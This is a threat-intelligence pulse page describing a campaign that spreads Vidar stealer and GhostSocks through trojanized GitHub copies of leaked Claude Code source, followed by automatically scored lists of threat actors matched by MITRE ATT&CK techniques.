Trusted Design

Threat Actors Leverage Claude Code Leak as Social Engineering Lure to Distribute Malicious Payloads via GitHub

概要

Cybercriminals are exploiting the recent Claude Code leak incident by using it as a social engineering tactic to deliver malware through GitHub repositories. The attackers have created trojanized versions of the leaked Claude source code, distributing malicious payloads including Vidar stealer version 18.7 and GhostSocks trojan. The campaign demonstrates rapid opportunistic exploitation of high-profile security incidents, with compromised repositories serving as delivery mechanisms. Organizations are advised to implement Zero Trust architecture to mitigate risks from shadow AI instances and trojanized Claude agents. Multiple GitHub repositories have been identified hosting the malicious code, with command and control infrastructure established across multiple IP addresses and domains.

Created: 2026-05-13

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

Scattered Spider

Score: 43.93
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1609 - Container Administration Command
  • T1083 - File and Directory Discovery
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1556.008 - Network Provider DLL
  • T1210 - Exploitation of Remote Services
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window
MITREへのリンク →

FIN4

Score: 5.58
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1543.003 - Windows Service
MITREへのリンク →

Turla

Score: 24.16
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1063 - Security Software Discovery
  • T1543.003 - Windows Service
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
  • T1578.001 - Create Snapshot
MITREへのリンク →

APT32

Score: 25.19
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1592.004 - Client Configurations
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

Saint Bear

Score: 8.12
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
MITREへのリンク →

FIN6

Score: 9.73
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1063 - Security Software Discovery
  • T1055.013 - Process Doppelgänging
  • T1597 - Search Closed Sources
MITREへのリンク →

Sidewinder

Score: 13.51
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1159 - Launch Agent
  • T1578.001 - Create Snapshot
MITREへのリンク →

MuddyWater

Score: 25.16
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1518.002 - Backup Software Discovery
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1159 - Launch Agent
MITREへのリンク →

Earth Lusca

Score: 20.82
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1562.004 - Disable or Modify System Firewall
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
MITREへのリンク →

TA577

Score: 3.42
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
MITREへのリンク →

Winter Vivern

Score: 17.30
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1562.004 - Disable or Modify System Firewall
  • T1055.013 - Process Doppelgänging
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
MITREへのリンク →

Silence

Score: 7.12
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1547.011 - Plist Modification
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

Contagious Interview

Score: 34.16
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1021.006 - Windows Remote Management
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1690 - Prevent Command History Logging
  • T1027.004 - Compile After Delivery
  • T1656 - Impersonation
MITREへのリンク →

LazyScripter

Score: 6.95
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1608.005 - Link Target
MITREへのリンク →

TA505

Score: 19.06
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1527 - Application Access Token
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

FIN7

Score: 18.96
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1562.001 - Disable or Modify Tools
  • T1027 - Obfuscated Files or Information
  • T1578.001 - Create Snapshot
MITREへのリンク →

Cobalt Group

Score: 12.09
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice
MITREへのリンク →

Higaisa

Score: 8.01
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1578.001 - Create Snapshot
MITREへのリンク →

Kimsuky

Score: 44.31
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1213.006 - Databases
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1546.011 - Application Shimming
  • T1009 - Binary Padding
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1609 - Container Administration Command
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1690 - Prevent Command History Logging
  • T1027.004 - Compile After Delivery
  • T1656 - Impersonation
MITREへのリンク →

Indrik Spider

Score: 8.63
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Molerats

Score: 3.42
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
MITREへのリンク →

Leafminer

Score: 4.50
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1051 - Shared Webroot
MITREへのリンク →

Mustang Panda

Score: 36.67
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1546.011 - Application Shimming
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1169 - Sudo
  • T1136.003 - Cloud Account
  • T1159 - Launch Agent
  • T1055.005 - Thread Local Storage
MITREへのリンク →

TA578

Score: 3.99
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1608.005 - Link Target
MITREへのリンク →

Evilnum

Score: 3.42
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
MITREへのリンク →

Star Blizzard

Score: 9.86
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1609 - Container Administration Command
MITREへのリンク →

GALLIUM

Score: 12.22
Matched TTPs:
  • T1584.008 - Network Devices
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1087.004 - Cloud Account
MITREへのリンク →

APT29

Score: 29.24
Matched TTPs:
  • T1584.008 - Network Devices
  • T1543.003 - Windows Service
  • T1202 - Indirect Command Execution
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1592.004 - Client Configurations
  • T1608.005 - Link Target
  • T1556.008 - Network Provider DLL
  • T1027.004 - Compile After Delivery
MITREへのリンク →

FIN13

Score: 16.17
Matched TTPs:
  • T1584.008 - Network Devices
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft
MITREへのリンク →

Dragonfly

Score: 19.33
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1531 - Account Access Removal
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Ke3chang

Score: 16.20
Matched TTPs:
  • T1584.008 - Network Devices
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1198 - SIP and Trust Provider Hijacking
  • T1090 - Proxy
  • T1087.004 - Cloud Account
MITREへのリンク →

Agrius

Score: 6.36
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
MITREへのリンク →

APT41

Score: 19.56
Matched TTPs:
  • T1584.008 - Network Devices
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1027 - Obfuscated Files or Information
  • T1574.009 - Path Interception by Unquoted Path
  • T1564.003 - Hidden Window
MITREへのリンク →

menuPass

Score: 12.17
Matched TTPs:
  • T1584.008 - Network Devices
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
MITREへのリンク →

Threat Group-3390

Score: 13.15
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1218.003 - CMSTP
  • T1590.006 - Network Security Appliances
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

Wizard Spider

Score: 16.34
Matched TTPs:
  • T1584.008 - Network Devices
  • T1543.003 - Windows Service
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
MITREへのリンク →

Ember Bear

Score: 15.34
Matched TTPs:
  • T1584.008 - Network Devices
  • T1562.004 - Disable or Modify System Firewall
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1656 - Impersonation
MITREへのリンク →

Storm-0501

Score: 13.53
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information
  • T1158 - Hidden Files and Directories
MITREへのリンク →

Sandworm Team

Score: 31.80
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1562.004 - Disable or Modify System Firewall
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools
  • T1027 - Obfuscated Files or Information
  • T1075 - Pass the Hash
MITREへのリンク →

Sea Turtle

Score: 5.14
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups
MITREへのリンク →

Leviathan

Score: 15.79
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1562.004 - Disable or Modify System Firewall
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
MITREへのリンク →

Gamaredon Group

Score: 20.96
Matched TTPs:
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

LuminousMoth

Score: 6.86
Matched TTPs:
  • T1543.003 - Windows Service
  • T1087.004 - Cloud Account
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

Confucius

Score: 5.43
Matched TTPs:
  • T1543.003 - Windows Service
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
MITREへのリンク →

Machete

Score: 3.79
Matched TTPs:
  • T1543.003 - Windows Service
  • T1027.004 - Compile After Delivery
MITREへのリンク →

FIN8

Score: 3.79
Matched TTPs:
  • T1543.003 - Windows Service
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

APT3

Score: 13.44
Matched TTPs:
  • T1543.003 - Windows Service
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
MITREへのリンク →

APT1

Score: 4.43
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
MITREへのリンク →

Lazarus Group

Score: 32.81
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1210 - Exploitation of Remote Services
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1055.005 - Thread Local Storage
  • T1578.001 - Create Snapshot
MITREへのリンク →

APT33

Score: 6.37
Matched TTPs:
  • T1543.003 - Windows Service
  • T1051 - Shared Webroot
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

ZIRCONIUM

Score: 13.35
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
  • T1578.001 - Create Snapshot
MITREへのリンク →

EXOTIC LILY

Score: 6.81
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1690 - Prevent Command History Logging
MITREへのリンク →

Magic Hound

Score: 24.47
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1547.005 - Security Support Provider
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

OilRig

Score: 15.48
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.001 - Spearphishing Attachment
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot
MITREへのリンク →

Windshift

Score: 4.19
Matched TTPs:
  • T1543.003 - Windows Service
  • T1159 - Launch Agent
MITREへのリンク →

TA2541

Score: 6.77
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
MITREへのリンク →

RedCurl

Score: 13.22
Matched TTPs:
  • T1543.003 - Windows Service
  • T1016.002 - Wi-Fi Discovery
  • T1090 - Proxy
  • T1051 - Shared Webroot
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Storm-1811

Score: 9.84
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact
MITREへのリンク →

APT42

Score: 4.43
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
MITREへのリンク →

APT39

Score: 14.69
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.001 - Spearphishing Attachment
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
MITREへのリンク →

APT38

Score: 25.45
Matched TTPs:
  • T1566.001 - Spearphishing Attachment
  • T1098.007 - Additional Local or Domain Groups
  • T1503 - Credentials from Web Browsers
  • T1009 - Binary Padding
  • T1590 - Gather Victim Network Information
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1493 - Transmitted Data Manipulation
MITREへのリンク →

UNC3886

Score: 21.18
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1546.011 - Application Shimming
  • T1009 - Binary Padding
  • T1021.006 - Windows Remote Management
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1578.001 - Create Snapshot
MITREへのリンク →

Volt Typhoon

Score: 25.25
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1049 - System Network Connections Discovery
  • T1584.002 - DNS Server
  • T1159 - Launch Agent
  • T1578.001 - Create Snapshot
MITREへのリンク →

Akira

Score: 11.20
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

APT28

Score: 15.59
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1608.005 - Link Target
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

HEXANE

Score: 8.66
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1159 - Launch Agent
MITREへのリンク →

IndigoZebra

Score: 3.53
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1608.005 - Link Target
MITREへのリンク →

RedEcho

Score: 3.92
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

Silent Librarian

Score: 4.96
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1609 - Container Administration Command
MITREへのリンク →

Moonstone Sleet

Score: 5.33
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

TeamTNT

Score: 16.09
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
MITREへのリンク →

CURIUM

Score: 9.70
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1578.001 - Create Snapshot
MITREへのリンク →

Medusa Group

Score: 20.06
Matched TTPs:
  • T1218.003 - CMSTP
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

LAPSUS$

Score: 14.06
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1609 - Container Administration Command
  • T1556.008 - Network Provider DLL
  • T1564.003 - Hidden Window
MITREへのリンク →

Salt Typhoon

Score: 6.19
Matched TTPs:
  • T1009 - Binary Padding
  • T1110.003 - Password Spraying
MITREへのリンク →

Rocke

Score: 8.88
Matched TTPs:
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Moses Staff

Score: 3.81
Matched TTPs:
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
MITREへのリンク →

Velvet Ant

Score: 6.54
Matched TTPs:
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

BlackByte

Score: 17.49
Matched TTPs:
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

SilverTerrier

Score: 5.81
Matched TTPs:
  • T1131 - Authentication Package
  • T1552.003 - Shell History
MITREへのリンク →

Aquatic Panda

Score: 4.39
Matched TTPs:
  • T1562.004 - Disable or Modify System Firewall
  • T1597 - Search Closed Sources
MITREへのリンク →

FIN5

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
MITREへのリンク →

Tonto Team

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Play

Score: 9.23
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

APT19

Score: 3.81
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
MITREへのリンク →

SideCopy

Score: 8.35
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1584.002 - DNS Server
  • T1159 - Launch Agent
MITREへのリンク →

Stealth Falcon

Score: 5.78
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
MITREへのリンク →

Tropic Trooper

Score: 11.63
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1136.003 - Cloud Account
  • T1159 - Launch Agent
MITREへのリンク →

Chimera

Score: 6.03
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1578.001 - Create Snapshot
MITREへのリンク →

Darkhotel

Score: 4.06
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1578.001 - Create Snapshot
MITREへのリンク →

HAFNIUM

Score: 14.39
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target
  • T1210 - Exploitation of Remote Services
MITREへのリンク →

Deep Panda

Score: 3.29
Matched TTPs:
  • T1177 - LSASS Driver
MITREへのリンク →

Axiom

Score: 6.91
Matched TTPs:
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery
MITREへのリンク →

Fox Kitten

Score: 11.59
Matched TTPs:
  • T1177 - LSASS Driver
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot
  • T1656 - Impersonation
MITREへのリンク →

APT37

Score: 4.68
Matched TTPs:
  • T1055.013 - Process Doppelgänging
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Windigo

Score: 5.09
Matched TTPs:
  • T1055.013 - Process Doppelgänging
  • T1159 - Launch Agent
MITREへのリンク →

BRONZE BUTLER

Score: 13.32
Matched TTPs:
  • T1592.004 - Client Configurations
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1159 - Launch Agent
  • T1578.001 - Create Snapshot
MITREへのリンク →

INC Ransom

Score: 10.28
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Cinnamon Tempest

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

APT17

Score: 5.45
Matched TTPs:
  • T1608.005 - Link Target
  • T1656 - Impersonation
MITREへのリンク →

DarkVishnya

Score: 6.94
Matched TTPs:
  • T1562.001 - Disable or Modify Tools
  • T1213.003 - Code Repositories
MITREへのリンク →

DarkHydrus

Score: 4.13
Matched TTPs:
  • T1531 - Account Access Removal
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1546.011 - Application Shimming
  • T1590.006 - Network Security Appliances
  • T1552.003 - Shell History
  • T1543.003 - Windows Service
  • T1690 - Prevent Command History Logging
  • T1051 - Shared Webroot
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1131 - Authentication Package
  • T1656 - Impersonation
  • T1027.004 - Compile After Delivery
  • T1098.007 - Additional Local or Domain Groups
  • T1609 - Container Administration Command
  • T1546.013 - PowerShell Profile
  • T1009 - Binary Padding
  • T1213.006 - Databases
MITREへのリンク →

Scattered Spider

Score: 0.69
Matched TTPs:
  • T1027 - Obfuscated Files or Information
  • T1552.003 - Shell History
  • T1556.008 - Network Provider DLL
  • T1051 - Shared Webroot
  • T1666 - Modify Cloud Resource Hierarchy
  • T1609 - Container Administration Command
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1564.003 - Hidden Window
  • T1083 - File and Directory Discovery
  • T1098.007 - Additional Local or Domain Groups
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1210 - Exploitation of Remote Services
  • T1590.006 - Network Security Appliances
  • T1547.005 - Security Support Provider
MITREへのリンク →

Mustang Panda

Score: 0.58
Matched TTPs:
  • T1546.011 - Application Shimming
  • T1055.013 - Process Doppelgänging
  • T1590.006 - Network Security Appliances
  • T1169 - Sudo
  • T1055.005 - Thread Local Storage
  • T1543.003 - Windows Service
  • T1136.001 - Local Account
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1098.007 - Additional Local or Domain Groups
  • T1159 - Launch Agent
  • T1546.013 - PowerShell Profile
  • T1136.003 - Cloud Account
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る